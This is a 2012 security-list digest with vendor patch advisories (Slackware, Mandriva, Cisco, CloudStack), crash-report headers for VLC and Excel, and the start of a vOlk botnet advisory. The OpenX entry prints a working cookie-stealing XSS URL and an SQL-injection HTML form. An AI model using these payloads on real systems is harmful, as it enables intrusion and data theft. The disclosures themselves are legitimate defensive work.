Re: FastStone Image Viewer 4.6 = ReadAVonIP Arbitrary Code Execution
Sorry, that's actually a NULL pointer bug. :) It's not exploitable.
[slackware-security] mozilla-firefox (SSA:2012-283-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] mozilla-firefox (SSA:2012-283-01) New mozilla-firefox packages are available for Slackware 13.37, 14.0, and -current to fix security issues. Here are the details from the Slackware 14.0 ChangeLog: +--+ patches/packages/mozilla-firefox-16.0-i486-1_slack14.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: http://www.mozilla.org/security/known-vulnerabilities/firefox.html (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/mozilla-firefox-16.0-i486-1_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/mozilla-firefox-16.0-x86_64-1_slack13.37.txz Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-firefox-16.0-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-firefox-16.0-x86_64-1_slack14.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-16.0-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-16.0-x86_64-1.txz MD5 signatures: +-+ Slackware 13.37 package: 29bb11fb476a0deba095a52fa404d21a mozilla-firefox-16.0-i486-1_slack13.37.txz Slackware x86_64 13.37 package: 4e519807dfc0f3e1624a5580ea9991d4 mozilla-firefox-16.0-x86_64-1_slack13.37.txz Slackware 14.0 package: 93783de27aad6a10d7bd4432df90eee2 mozilla-firefox-16.0-i486-1_slack14.0.txz Slackware x86_64 14.0 package: dd98523d46b575f31f600fd81657caf8 mozilla-firefox-16.0-x86_64-1_slack14.0.txz Slackware -current package: 810e5194f8f22883670c72b35ae2a23e xap/mozilla-firefox-16.0-i486-1.txz Slackware x86_64 -current package: 13d830a035d24d53dd14196fc3380250 xap/mozilla-firefox-16.0-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg mozilla-firefox-16.0-i486-1_slack14.0.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlB06J0ACgkQakRjwEAQIjN+awCdGLC+mkCvGAL2je/cbkRZzyc4 M8AAn2QHOMUIDYMmQH2QfqVr0z1S4DW4 =hcgW -END PGP SIGNATURE-
[ MDVSA-2012:162 ] bind
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:162 http://www.mandriva.com/security/ ___ Package : bind Date: October 10, 2012 Affected: 2011., Enterprise Server 5.0 ___ Problem Description: A vulnerability was discovered and corrected in bind: A certain combination of records in the RBT could cause named to hang while populating the additional section of a response. [RT #31090] (CVE-2012-5166). The updated packages have been upgraded to bind 9.7.6-P4 and 9.8.3-P4 which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5166 https://kb.isc.org/article/AA-00801 ftp://ftp.isc.org/isc/bind9/9.7.6-P4/CHANGES ftp://ftp.isc.org/isc/bind9/9.8.3-P4/CHANGES ___ Updated Packages: Mandriva Linux 2011: 674904bbe6055bbce6addee9df404492 2011/i586/bind-9.8.3-0.0.P4.0.1-mdv2011.0.i586.rpm a04233b14f792b187f52bb12975d6616 2011/i586/bind-devel-9.8.3-0.0.P4.0.1-mdv2011.0.i586.rpm c8f5d3ceb296f04eb7b09ec3a4f72ee9 2011/i586/bind-doc-9.8.3-0.0.P4.0.1-mdv2011.0.i586.rpm 0dae4f49ec8626b2d985f38cc206410e 2011/i586/bind-utils-9.8.3-0.0.P4.0.1-mdv2011.0.i586.rpm c614ce64e6fbf4610ca67ff37bc57d28 2011/SRPMS/bind-9.8.3-0.0.P4.0.1.src.rpm Mandriva Linux 2011/X86_64: a40a739988c6d0277ea2ff9862956bae 2011/x86_64/bind-9.8.3-0.0.P4.0.1-mdv2011.0.x86_64.rpm 4136bd8e81216d03ccd5b389f208250d 2011/x86_64/bind-devel-9.8.3-0.0.P4.0.1-mdv2011.0.x86_64.rpm 84ff9042691182668122ece8d7f67a20 2011/x86_64/bind-doc-9.8.3-0.0.P4.0.1-mdv2011.0.x86_64.rpm 39439c8b0e3b9f89f17bbf9e4c8b088d 2011/x86_64/bind-utils-9.8.3-0.0.P4.0.1-mdv2011.0.x86_64.rpm c614ce64e6fbf4610ca67ff37bc57d28 2011/SRPMS/bind-9.8.3-0.0.P4.0.1.src.rpm Mandriva Enterprise Server 5: c37fb5666ee6ac7d83dc2fbeceebd39f mes5/i586/bind-9.7.6-0.0.P4.0.1mdvmes5.2.i586.rpm f60d20d6870bf103f24d41a50d8b7c2e mes5/i586/bind-devel-9.7.6-0.0.P4.0.1mdvmes5.2.i586.rpm 59e509a6e0a72a178bf80f237000ef7e mes5/i586/bind-doc-9.7.6-0.0.P4.0.1mdvmes5.2.i586.rpm 6db1bd8c47448801f8f0f163046bb4f7 mes5/i586/bind-utils-9.7.6-0.0.P4.0.1mdvmes5.2.i586.rpm 0e32cc1eb2b98495c828990ad3fe868d mes5/SRPMS/bind-9.7.6-0.0.P4.0.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: bb6806ee598c72bc218098eefc6fafa4 mes5/x86_64/bind-9.7.6-0.0.P4.0.1mdvmes5.2.x86_64.rpm 83c8197a29ee75ccf9396b0773aada77 mes5/x86_64/bind-devel-9.7.6-0.0.P4.0.1mdvmes5.2.x86_64.rpm 0cb5d1455f341f27601104e45395308b mes5/x86_64/bind-doc-9.7.6-0.0.P4.0.1mdvmes5.2.x86_64.rpm 1ec00fc2d8bcb0eb7d8aec80535b589b mes5/x86_64/bind-utils-9.7.6-0.0.P4.0.1mdvmes5.2.x86_64.rpm 0e32cc1eb2b98495c828990ad3fe868d mes5/SRPMS/bind-9.7.6-0.0.P4.0.1mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQdULemqjQ0CJFipgRAqmHAKDZVAV8OmU7wk0ieb0RhgXhjp1/hQCgwfW7 zf2hK/iuE08rZtMXpzK6bIs= =JF6q -END PGP SIGNATURE-
Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module Advisory ID: cisco-sa-20121010-asa Revision 1.0 For Public Release 2012 October 10 16:00 UTC (GMT) - -- Summary === Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) may be affected by the following vulnerabilities: DHCP Memory Allocation Denial of Service Vulnerability SSL VPN Authentication Denial of Service Vulnerability SIP Inspection Media Update Denial of Service Vulnerability DCERPC Inspection Buffer Overflow Vulnerability Two DCERPC Inspection Denial Of Service Vulnerabilities These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Successful exploitation of any of these vulnerabilities could allow an unauthenticated remote attacker to trigger a reload of the affected device. Exploitation of the DCERPC Inspection Buffer Overflow Vulnerability could additionally cause a stack overflow and possibly the execution of arbitrary commands. Cisco has released free software updates that address these vulnerabilities. Workarounds are available for some of these vulnerabilities. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121010-asa Note: The Cisco Firewall Services Module for Cisco Catalyst 6500 and Cisco 7600 Series (FWSM) may be affected by some of the vulnerabilities listed above. A separate Cisco Security Advisory has been published to disclose the vulnerabilities that affect the Cisco FWSM. This advisory is available at: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121010-fwsm The Cisco ASA 1000V Cloud Firewall and Cisco ASA-CX Context-Aware Security are not affected by any of these vulnerabilities. -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.18 (Darwin) Comment: GPGTools - http://gpgtools.org iF4EAREIAAYFAlB1jRsACgkQUddfH3/BbTo1RwD+NHNKsAkrc/dZ+XAhDtqAyVIY xaVp6BpwmKAnBbDtwVQA/jXPlWJbmNmSOiHTAI30KkXahf9Bi9+bIvnQyeUI6aUM =Ncu5 -END PGP SIGNATURE-
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Firewall Services Module
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Multiple Vulnerabilities in Cisco Firewall Services Module Advisory ID: cisco-sa-20121010-fwsm Revision 1.0 For Public Release 2012 October 10 16:00 UTC (GMT) - -- Summary === The Cisco Firewall Services Module (FWSM) for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers is affected by the following vulnerabilities: DCERPC Inspection Buffer Overflow Vulnerability DCERPC Inspection Denial Of Service Vulnerabilities These vulnerabilities are not interdependent; a release that is affected by one vulnerability is not necessarily affected by the other. Exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to trigger a reload of the affected device, or to execute arbitrary commands. Repeated exploitation could result in a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. There are no workarounds that mitigate these vulnerabilities. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121010-fwsm Note: The Cisco Catalyst 6500 Series ASA Services Module, and the Cisco ASA 5500 Series Adaptive Security Appliance may also be affected by these vulnerabilities. The vulnerabilities affecting the Cisco Catalyst 6500 Series ASA Services Module and Cisco ASA 5500 Series Adaptive Security Appliance have been disclosed in a separate Cisco Security Advisory. The Advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121010-asa -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.18 (Darwin) Comment: GPGTools - http://gpgtools.org iF4EAREIAAYFAlB1h6AACgkQUddfH3/BbTrdbQD/WPf0vA8pJbKyFgfDQ0rol2r4 AAAdCeOQlELptysCaYsBAIZP/vuW1jX43H6pLgx9xBum9wcNBvhzG1m9Bip+nGbH =e0NQ -END PGP SIGNATURE-
Cisco Security Advisory: Multiple Vulnerabilities in the Cisco WebEx Recording Format Player
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Multiple Vulnerabilities in the Cisco WebEx Recording Format Player Advisory ID: cisco-sa-20121010-webex Revision 1.0 For Public Release 2012 October 10 16:00 UTC (GMT) - -- Summary === The Cisco WebEx Recording Format (WRF) player contains six buffer overflow vulnerabilities. In some cases, exploitation of the vulnerabilities could allow a remote attacker to execute arbitrary code on the system with the privileges of a targeted user. The Cisco WebEx WRF Player is an application used to play back WRF WebEx meeting recordings that have been recorded on a WebEx meeting site or on the computer of an online meeting attendee. The Cisco WebEx WRF Player can be automatically installed when the user accesses a recording file that is hosted on a WebEx meeting site. The Cisco WebEx WRF Player can also be manually installed for offline playback after downloading the application from: http://www.webex.com/play-webex-recording.html. If the Cisco WebEx WRF Player was automatically installed, it will be automatically upgraded to the latest, nonvulnerable version when users access a recording file that is hosted on a WebEx meeting site. If the Cisco WebEx WRF Player was manually installed, users will need to manually install a new version of the Cisco WebEx WRF Player after downloading the latest version from: http://www.webex.com/play-webex-recording.html. Cisco has updated affected versions of the WebEx meeting sites and Cisco WebEx WRF Player to address these vulnerabilities. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121010-webex -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.18 (Darwin) Comment: GPGTools - http://gpgtools.org iF4EAREIAAYFAlB1h6AACgkQUddfH3/BbTrjWAD/Xo3bSaXFymHXWKgoGNJQTRcp MFilgSgS+0Hp09ncDC0A/R+0E3BmJFwMukJw6IPAQkp+AjYus1naLVDcQMjh7svJ =tuKg -END PGP SIGNATURE-
[CVE-2012-4501] CloudStack configuration vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 CVE-2012-4501: Apache CloudStack configuration vulnerability Severity: Critical Vendors: The Apache Software Foundation Citrix, Inc. Versions Affected: As no official releases have been made, this does not affect any official Apache CloudStack releases. Anybody using a version of CloudStack generated from the Apache CloudStack source tree prior to October 7th, 2012 will need to take the actions specified below. Please note this includes both Citrix CloudStack commercial and open-source, pre-ASF versions. Description: The CloudStack PPMC was notified of a configuration vulnerability that exists in development versions of the Apache Incubated CloudStack project. This vulnerability allows a malicious user to execute arbitrary CloudStack API calls. A malicious user could, for example, delete all VMs in the system. Addressing this issue is especially important for anybody using CloudStack in a public environment. Mitigation: 1) Login to the CloudStack Database via MySQL $ mysql -u cloud -p -h host-ip-address (enter password as prompted) 2) Disable the system user and set a random password: mysql update cloud.user set password=RAND() where id=1; 3) Exit MySQL mysql \q Alternatively, users can update to a version of CloudStack based on the git repository on or after October 7th, 2012. Credit: This issue was identified by Hugo Trippaers of Schuberg Philis. -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Mozilla - http://www.enigmail.net/ iQIcBAEBCgAGBQJQcebmAAoJEOom9N0pCN7SdZwQAKd82/zTgWAMibLYhgnsiKDo hJ/O0kNxP3MUGN5L131K61titfZ9se37z2dmBpBEYKc5X3jHkbnG+o7vPSyD9Bc6 +UzddIkkUy/eXZSNuFXdth+GTFKuCBhbMpWzRYYzXLU+v6G8YqwdZGdUyNTp8oi1 MnQ/2KvLCAi5hiG1YeZCXnNdDyv2fLGW6phbS5UTsG8OLUDZe2Ycerjw+zl88BCi MhgHpBwOti8mikTrodEWG5lSlIksVOHnLPA2Ycz4QSGnqK6VhyCfQWNJeMq+/TGK JYc30c0DiUsCDjXCsymxWyEmK9ePFWxOLzvFYYRA/Iuhg9J89ADvHr1JM8QEoFGV cOt1YLV+zTKuUhxCx0nHTVUxBS9A2Giez3GyPQ+WmW7ph2erC7GL7oKdLtdgJBBc odlf8F+0xREQocqi85t9v65PDXRjOdmAfaGwogzibIA9sweDlefhMTzCgSsAtIKF +hkHqZD2oRP4YxQ05vp8CSXBf4UCVx7169nSu9GA3HjllsXNqyhY0h1hjkZkBcd1 To5Rfd0bVNNoxMyfdCA9sd5fQZ1XTivwRpBGkEWJirxM7Z7hFddDQdqebeeBExk/ yE+geeNcK2RMl5Tqtzkbs9DeLnijJyRuU1xzRHQOsXLSp/RYaZlrEnd/UzxZ+9up bvYem89raMxulY7lzngu =+bQS -END PGP SIGNATURE-
VLC Player 2.0.3 = ReadAV Arbitrary Code Execution (Update)
#!/usr/bin/perl # VLC Player 2.0.3 = ReadAV Arbitrary Code Execution # Author: Jean Pascal Pereira pere...@secbiz.de # Vendor URI: http://www.videolan.org/vlc/ # Vendor Description: # VLC is a free and open source cross-platform multimedia player # and framework that plays most multimedia files as well as DVD, # Audio CD, VCD, and various streaming protocols. # Debug Info: # Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 # Copyright (c) Microsoft Corporation. All rights reserved. # # CommandLine: C:\Program Files\VideoLAN\VLC\vlc.exe C:\research\VLC\crafted.png # Symbol search path is: *** Invalid *** # # * Symbol loading may be unreliable without a symbol search path. * # * Use .symfix to have the debugger choose a symbol path. * # * After setting your symbol path, use .reload to refresh symbol locations. * # # Executable search path is: # ModLoad: 0040 0042 image0040 # ModLoad: 7c90 7c9b2000 ntdll.dll # ModLoad: 7c80 7c8f6000 C:\WINDOWS\system32\kernel32.dll # ModLoad: 6a30 6a322000 C:\Program Files\VideoLAN\VLC\libvlc.dll # ModLoad: 6a54 6a775000 C:\Program Files\VideoLAN\VLC\libvlccore.dll # ModLoad: 77dd 77e6b000 C:\WINDOWS\system32\ADVAPI32.DLL # ModLoad: 77e7 77f03000 C:\WINDOWS\system32\RPCRT4.dll # ModLoad: 77fe 77ff1000 C:\WINDOWS\system32\Secur32.dll # ModLoad: 77c1 77c68000 C:\WINDOWS\system32\msvcrt.dll # ModLoad: 7c9c 7d1d7000 C:\WINDOWS\system32\SHELL32.DLL # ModLoad: 77f1 77f59000 C:\WINDOWS\system32\GDI32.dll # ModLoad: 7e41 7e4a1000 C:\WINDOWS\system32\USER32.dll # ModLoad: 77f6 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll # ModLoad: 76b4 76b6d000 C:\WINDOWS\system32\WINMM.DLL # ModLoad: 71ab 71ac7000 C:\WINDOWS\system32\WS2_32.DLL # ModLoad: 71aa 71aa8000 C:\WINDOWS\system32\WS2HELP.dll # ModLoad: 76bf 76bfb000 C:\WINDOWS\system32\PSAPI.DLL # ModLoad: 3d93 3da16000 C:\WINDOWS\system32\WININET.DLL # ModLoad: 003f 003f9000 C:\WINDOWS\system32\Normaliz.dll # ModLoad: 7813 78263000 C:\WINDOWS\system32\urlmon.dll # ModLoad: 774e 7761e000 C:\WINDOWS\system32\ole32.dll # ModLoad: 7712 771ab000 C:\WINDOWS\system32\OLEAUT32.dll # ModLoad: 3dfd 3e1bb000 C:\WINDOWS\system32\iertutil.dll # (950.5c0): Break instruction exception - code 8003 (first chance) # ModLoad: 7639 763ad000 C:\WINDOWS\system32\IMM32.DLL # ModLoad: 773d 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll # ModLoad: 64fc 64ffb000 C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll # ModLoad: 6b24 6b253000 C:\Program Files\VideoLAN\VLC\plugins\audio_output\libaout_directx_plugin.dll # ModLoad: 6e98 6e992000 C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll # ModLoad: 6d68 6d698000 C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectx_plugin.dll # ModLoad: 6388 6389 C:\Program Files\VideoLAN\VLC\plugins\mmxext\libmemcpymmxext_plugin.dll # ModLoad: 6c40 6c443000 C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll # ModLoad: 6874 6875d000 C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll # ModLoad: 6f44 6f485000 C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll # ModLoad: 6b84 6b852000 C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll # ModLoad: 6f10 6f111000 C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll # ModLoad: 63a8 63af3000 C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libstream_filter_httplive_plugin.dll # ModLoad: 00f0 00fb7000 C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libstream_filter_dash_plugin.dll # ModLoad: 69e4 69e5 C:\Program Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll # ModLoad: 6ae4 6ae5b000 C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll # ModLoad: 64ac 64acf000 C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libstream_filter_record_plugin.dll # ModLoad: 7024 7026 C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll # ModLoad: 6cd0 6ce48000 C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll # ModLoad: 6604 66092000 C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll # ModLoad: 625c 626f4000 C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll # ModLoad: 6ff4 6ff52000 C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll # ModLoad: 6e18 6e19 C:\Program Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll # ModLoad: 6d6c 6d6f6000 C:\Program
Microsoft Office Excel ReadAV Arbitrary Code Execution
#!/usr/bin/perl # Microsoft Office Excel ReadAV Arbitrary Code Execution # Author: Jean Pascal Pereira pere...@secbiz.de # Vendor URI: http://office.microsoft.com # Vendor Description: # Microsoft Excel is a commercial spreadsheet application written and distributed by Microsoft for Microsoft Windows and Mac OS X. # It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. # Affected versions: # Microsoft Office 2007 (confirmed) # Microsoft Excel Reader 12 (confirmed) # Microsoft Office 2010 (not confirmed yet) # Debug Info: # Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 # Copyright (c) Microsoft Corporation. All rights reserved. # # CommandLine: C:\Program Files\Microsoft Office\Office12\XLVIEW.EXE C:\research\MSExcel\crafted.xls # Symbol search path is: *** Invalid *** # # * Symbol loading may be unreliable without a symbol search path. * # * Use .symfix to have the debugger choose a symbol path. * # * After setting your symbol path, use .reload to refresh symbol locations. * # # Executable search path is: # ModLoad: 3000 30cd8000 Excel.exe # ModLoad: 7c90 7c9b2000 ntdll.dll # ModLoad: 7c80 7c8f6000 C:\WINDOWS\system32\kernel32.dll # ModLoad: 77dd 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll # ModLoad: 77e7 77f03000 C:\WINDOWS\system32\RPCRT4.dll # ModLoad: 77fe 77ff1000 C:\WINDOWS\system32\Secur32.dll # ModLoad: 77f1 77f59000 C:\WINDOWS\system32\GDI32.dll # ModLoad: 7e41 7e4a1000 C:\WINDOWS\system32\USER32.dll # ModLoad: 774e 7761e000 C:\WINDOWS\system32\ole32.dll # ModLoad: 77c1 77c68000 C:\WINDOWS\system32\msvcrt.dll # ModLoad: 7813 781cb000 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\MSVCR80.dll # ModLoad: 7300 73026000 C:\WINDOWS\system32\WINSPOOL.DRV # ModLoad: 3a9d 3b754000 C:\Program Files\Microsoft Office\Office12\oart.dll # ModLoad: 7712 771ab000 C:\WINDOWS\system32\OLEAUT32.dll # (9c.380): Break instruction exception - code 8003 (first chance) # ModLoad: 7639 763ad000 C:\WINDOWS\system32\IMM32.DLL # ModLoad: 3260 3361f000 C:\Program Files\Common Files\Microsoft Shared\office12\mso.dll # ModLoad: 7d1e 7d49c000 C:\WINDOWS\system32\msi.dll # ModLoad: 5ad7 5ada8000 C:\WINDOWS\system32\uxtheme.dll # ModLoad: 773d 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\Comctl32.dll # ModLoad: 77f6 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll # ModLoad: 7472 7476c000 C:\WINDOWS\system32\MSCTF.dll # ModLoad: 77c0 77c08000 C:\WINDOWS\system32\version.dll # ModLoad: 755c 755ee000 C:\WINDOWS\system32\msctfime.ime # ModLoad: 0108 016d4000 C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSORES.DLL # ModLoad: 016e 020bd000 C:\Program Files\Common Files\Microsoft Shared\office12\1033\MSOINTL.DLL # ModLoad: 3bd1 3bea4000 C:\Program Files\Common Files\Microsoft Shared\OFFICE12\OGL.DLL # ModLoad: 76f5 76f58000 C:\WINDOWS\system32\WTSAPI32.DLL # ModLoad: 7636 7637 C:\WINDOWS\system32\WINSTA.dll # ModLoad: 5b86 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll # ModLoad: 7900 7904a000 C:\WINDOWS\system32\mscoree.dll # ModLoad: 77c0 77c08000 C:\WINDOWS\system32\VERSION.DLL # ModLoad: 7c9c 7d1d7000 C:\WINDOWS\system32\SHELL32.DLL # ModLoad: 5d09 5d12a000 C:\WINDOWS\system32\comctl32.dll # ModLoad: 76fd 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL # ModLoad: 7705 77115000 C:\WINDOWS\system32\COMRes.dll # ModLoad: 0245 02715000 C:\WINDOWS\system32\xpsp2res.dll # ModLoad: 7792 77a13000 C:\WINDOWS\system32\SETUPAPI.dll # ModLoad: 71b2 71b32000 C:\WINDOWS\system32\MPR.DLL # ModLoad: 3a78 3a889000 C:\Program Files\Common Files\Microsoft Shared\office12\riched20.dll # (9c.380): Access violation - code c005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=0001 ebx=00128320 ecx=00123b40 edx=008d2d04 esi=02284800 edi=0130 # eip=3025c1fc esp=00123b30 ebp=00123b48 iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 # *** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe - # Excel!Ordinal40+0x25c1fc: # 3025c1fc 668b0f mov cx,word ptr [edi] ds:0023:0130= # 0:000 r;!exploitable -v;q # eax=0001 ebx=00128320 ecx=00123b40 edx=008d2d04 esi=02284800 edi=0130 # eip=3025c1fc esp=00123b30 ebp=00123b48 iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=
Multiple vulnerabilities in OpenX
Advisory ID: HTB23116 Product: OpenX Vendor: OpenX Vulnerable Version(s): 2.8.10 and probably prior Tested Version: 2.8.10 Vendor Notification: September 19, 2012 Public Disclosure: October 10, 2012 Vulnerability Type: Cross-Site Scripting [CWE-79], SQL Injection [CWE-89] CVE References: CVE-2012-4989, CVE-2012-4990 CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Risk Level: Medium Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenX, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks. 1) Cross-Site Scripting (XSS) in OpenX: CVE-2012-4989 Input passed via the parent GET parameter to /www/admin/plugin-index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website. The following PoC (Proof of Concept) demonstrates the vulnerability: http://[host]/www/admin/plugin-index.php?action=infogroup=vastInlineBannerTypeHtmlparent=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 2) SQL Injection in OpenX: CVE-2012-4990 Input passed via the ids[] POST parameter to /www/admin/campaign-zone-link.php is not properly sanitised before being used in SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following PoC demonstrates the vulnerability: form action=http://[host]/www/admin/campaign-zone-link.php; method=post input type=hidden name=action value='link' / input type=hidden name=ids[] value=z1)) OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- / input type=hidden name=clientid value='[CLIENT_ID]' / input type=hidden name=campaignid value='[CAMPAIGN_ID]' / input type=hidden name= value='' / input type=hidden name= value='' / input type=hidden name= value='' / input type=hidden name= value='' / input type=submit id=btn /form Successful exploitation of this vulnerability requires attacker to be registered, logged-in and have permission to access link zone. --- Solution: Fixed in SVN repository, revision 81823 Replace next files: [CWE-79] https://svn.openx.org/openx/trunk/lib/templates/admin/plugin-group-view.html [CWE-89] https://svn.openx.org/openx/trunk/www/admin/campaign-zone-link.php --- References: [1] High-Tech Bridge Advisory HTB23116 - https://www.htbridge.com/advisory/HTB23116 - Multiple vulnerabilities in OpenX. [2] OpenX - http://www.openx.com - Open source ad serving platform for publishers. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
Title: == vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities Date: = 2012-10-09 References: === http://www.vulnerability-lab.com/get_content.php?id=721 VL-ID: = 721 Common Vulnerability Scoring System: 8.3 Introduction: = vOlk-Botnet v4.0 is a remote administration tool, its main function is to manage the HOSTS file of the windows operating systems The code created by [byvOlk] PHP and Visual Basic 6.0. Features: [+] Add Startup [+] Download Execute. [+] Visit Webpage [Visible]. [+] Visit Webpage [Invisible]. [+] Mutex [+] Stealer FTP(Filezilla) [+] Msn Stealer(Messenger Save User) [+] Statistics Bot s Abstract: = The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the vOlk-Botnet framework application v4.0 private edition. Report-Timeline: 2012-10-09: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical 